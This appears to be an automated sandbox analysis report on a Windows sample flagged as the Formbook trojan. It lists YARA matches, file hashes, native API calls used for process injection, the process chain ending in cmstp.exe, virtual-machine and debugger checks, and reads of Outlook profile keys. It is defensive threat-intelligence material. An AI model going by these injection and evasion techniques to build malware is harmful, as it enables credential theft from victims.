          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: String function: 00401980 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: String function: 00B1B150 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0041E833 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0041E653 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0041E703 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0041E783 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B5B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B5A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B5AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B5A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B5A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B59760 NtOpenProcess,
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\mcwfy.exe C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
          Source: u8QPnVhq0N.exe | ReversingLabs: Detection: 46%
          Source: u8QPnVhq0N.exe | Virustotal: Detection: 48%
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | File read: C:\Users\user\Desktop\u8QPnVhq0N.exe
          Source: u8QPnVhq0N.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\u8QPnVhq0N.exe C:\Users\user\Desktop\u8QPnVhq0N.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | File created: C:\Users\user\AppData\Local\Temp\nsl6A3D.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/5@12/10
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cmstp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: u8QPnVhq0N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Unpacked PE file: 3.2.mcwfy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_00410A64 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0040A846 push cs; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00411320 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0040DC2C pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0040B4FA push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0040AD0D push 255F11F9h; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0041B674 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00401E20 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | File created: C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 1008 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3608 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B46A60 rdtscp
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 880
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 876
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | API coverage: 8.4 %
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_020607DA GetSystemInfo,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_004089B8 FindFirstFileExW,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.533383702.000000000ED9C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWAz
          Source: explorer.exe, 00000004.00000002.569424230.0000000004437000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.559686788.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.536187696.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533502137.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581354235.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553825215.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.563071453.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
          Source: explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_0040B06F GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
